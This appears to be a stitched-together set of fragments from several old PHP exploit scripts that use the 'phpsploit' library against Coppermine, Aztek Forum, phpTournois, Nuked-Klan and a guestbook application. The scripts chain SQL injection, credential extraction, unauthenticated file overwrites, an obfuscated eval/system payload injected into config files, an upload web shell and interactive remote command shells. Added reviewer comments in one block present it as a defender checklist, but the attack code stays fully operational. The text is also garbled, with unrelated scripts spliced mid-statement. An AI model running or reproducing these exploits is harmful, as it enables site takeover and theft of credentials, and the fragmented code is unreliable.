} else { return; } } $url = getparam("url", 1); $login = getparam("login", 1); $pass = getparam("pass", 1); $email = getparam("email", 1); $file = getparam("file", 1); $id = getparam("id"); $source = @file_get_contents($file); if (strlen($source) < 2) { exit("{$file} don't exist.\n"); } $xpl = new phpsploit(); $s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}"); //Cookies if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) { $xpl->addcookie("PHPSESSID", $phpsessid[1]); $xpl->addcookie("sql_pseudo", $login); $xpl->addcookie("sql_pass", md5($pass)); $xpl->addcookie("auto", "off"); print "[*] PHPSESSID : {$phpsessid['1']}\n"; } else { exit("[*] Can't log in\n"); } //Id if (!isset($id)) { preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member); $id = $id_member[1]; }
Table prefix. /*/ print "\nstatus> Searching the version"; $xpl->get($url . 'include/index.html'); if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) { print "\nsploit> Coppermine version " . $matches[1]; } else { print "\nsploit> Not found"; } $table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users'; /*/ If you have the admin cookie (but not the password), replace lines 73=>76 by $xpl->addcookie('yourcookie'); /*/ print "\nstatus> Trying to get logged in"; $xpl->post($url . "login.php?referer=index.php", "username={$adu}&password={$adp}&remember_me=1&submitted=Se+Connecter"); if (!preg_match("#color:red#", $xpl->getcontent())) { print "\nsploit> Done"; } else { die("\nstatus> Exploit failed\n"); } /*/ (usermgr.php) ============= case 'group_alb_access' : if (isset($_GET['gid'])) $group_id = $_GET['gid']; $sql = "SELECT group_name FROM [...] WHERE group_id = $group_id [...]"; $result = cpg_db_query($sql); (db_ecard.php) ==============
if (!empty($pra)) { $xpl->proxyauth($pra); } print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit"; print "\nheader> =================================================="; if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) { print "\nsploit> Owner -> " . $matches[1]; } else { die("\nsploit> Exploit failed"); } $owner = $matches[1]; print "\nstatus> Trying to register a new user"; $xpl->cookiejar(1); $xpl->allowredirection(1); $name = "phpsploit" . rand(); $xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on"); print "\nsploit> Login/Password -> {$name}"; print "\nstatus> Trying to get database informations"; $xpl->get($url . "forum.php?fid=XD"); if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) { print "\nsploit> Full Path Disclosure -> " . $matches[1]; } else { print "\nsploit> Failed"; } $wanted = str_replace("forum/load.php", "common/bddconf.php", $matches[1]); if (!empty($wanted)) { $xpl->get($url . "index.php?owner={$owner}&action=profile&_SERVER[email]={$name}%40hotmail.coum&_FILES[upload][tmp_name]={$wanted}&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg"); $xpl->get($url . "index.php?owner={$owner}&choix=3"); if (preg_match("#<IMG src='(.*)' width='([0-9]*)' height='([0-9]*)'>#i", $xpl->getcontent(), $matches)) { print "\nsploit> Done (" . $matches[1] . ")"; } else {
// Top-level driver of a legacy phpsploit-based script: every step below is an
// HTTP request against $url. getparam() and the phpsploit class come from the
// surrounding file (not visible here).
// NOTE(review): read this block as a checklist of server-side checks the target
// application is missing — each per-step comment names the corresponding
// control and the request-log indicator a defender can alert on.
$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
// String that is later embedded into config.inc.php through $minimdata; it
// evaluates whatever arrives in the custom `Shell` request header.
$cod = 'eval($_SERVER[HTTP_SHELL]);';
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if ($prx) {
    $xpl->proxy($prx);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
// Steps 0x01-0x03: no login precedes these requests, so the script relies on
// dirsys/modules/auth.php accepting `suppr=1` and a login/password pair from an
// unauthenticated client. Server-side control: both actions must require an
// authenticated admin session; a POST with `suppr=1` to this path is the
// request-log indicator.
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
// The DEBUG value is `0;` + $cod + `//`: because the application writes config
// values into a PHP file without quoting (per the original comment), the `;`
// closes the assignment and `//` comments out the remainder of the line.
// Server-side control: config values written into PHP source must be
// escaped/serialised (e.g. var_export()) rather than concatenated raw.
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP'
    . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD'
    . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER'
    . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE'
    . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB'
    . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE'
    . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
print "\n0x05>Now enter your commands";
// Interactive loop: each GET of dirsys/config.inc.php carries a non-standard
// `Shell` header and the response body is printed verbatim. Indicators for
// defenders: direct requests for an include file (config.inc.php should not be
// web-reachable — deny it at the web-server level) and unknown request header
// names such as `Shell` in access/WAF logs.
// eregi() was removed in PHP 7, so the loop's exit test is a fatal error on a
// modern interpreter; the script targets a PHP 5-era toolchain.
do {
    $xpl->addheader('Shell', "@system({$cmd});");
    $xpl->get($url . 'dirsys/config.inc.php');
    print $xpl->getcontent() . "\n0x06>";
} while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN))));
exit(0);
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999); if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) { print "done\n"; } else { die("error\n"); } if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) { $img = $match[1]; } else { die(" * can't find image name\n"); } /* Change homepage to our avatar, with a null byte, after saving website name. */ print " * changing homepage\t"; preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all); $postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n"; $success = true; if ($mode == 0) { print " * loading uploader\t"; $xpl->addheader("upload", "1"); if (preg_match("#upfiledone#i", $xpl->get($url))) { print "done\n"; } else { $success = false; print "error\n"; } } else { print "\n\$shell> "; while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->reset('header');
$adm = getparam("admin"); $acc = getparam("user"); $prx = getparam("proxy"); $prefix = getparam("prefix") ? getparam("prefix") : "nuked_"; $file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>'; $date = array(date('Y'), date('m'), date('d')); $xpl = new phpsploit(); if ($prx) { $xpl->proxy($prx); } /* Admin account defined */ if ($adm) { print "[*] Using admin account {$adm}\n"; list($login, $passwd) = explode(":", $adm); $xpl->addheader("Referer", $url); $c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok"); if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) { $admin_sid = $sid[1]; $admin_uid = $uid[1]; print " SID -> {$admin_sid}\n"; print " UID -> {$admin_uid}\n"; finalattack($admin_sid, $admin_uid); } else { exit("[*] Can't log in\n"); } } else { /* User account defined */ if ($acc) { print "[*] Using user account {$acc}\n"; list($login, $passwd) = explode(":", $acc); $xpl->addheader("Referer", $url);
| ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'"); | // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre` | /*/ $sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) { print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2]; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to get logged in"; $xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification"); if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to add a skin"; // skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755) $xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter"); if (!preg_match('#alert\\("ERREUR\\n#', $xpl->getcontent())) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } $scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d)." . "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70)." . "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65)." . "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45)." . "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27)." . "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52)." . "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52)." . "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)"; $data = "skin_edit=skins.php%3Ff_sid%3D" . $sid[1] . "%26skin_edit" . "%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e" . "val({$scode});exit(0);\r\n?>&add_message=&nb_message_pa" . "ge=&list_pages=&corps_messages=&space=&assembly=&enre" . "gistrer=Enregistrer";
$xpl->addheader('Referer', $url); $xpl->formdata($phpc); $xpl->get($url . '?file=User&op=edit_pref'); if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) { exit("\nNo file found"); } else { print "\n\$shell> "; } $sql = array(); $sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;"; /* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE {$config['0']}_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;"; $sql[] = "DELETE FROM {$config['0']}_nbconnecte;"; for ($i = 0; $i < count($sql); $i++) { $xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]); } while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { # 0'); include('./conf.inc.php'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell', "system('{$cmd}');"); $xpl->get($url); $data = explode('123456789', $xpl->getcontent()); print $data[1] . "\n\$shell> "; } function char($data) { $char = 'CHAR('; for ($i = 0; $i < strlen($data); $i++) { $char .= ord($data[$i]); if ($i != strlen($data) - 1) {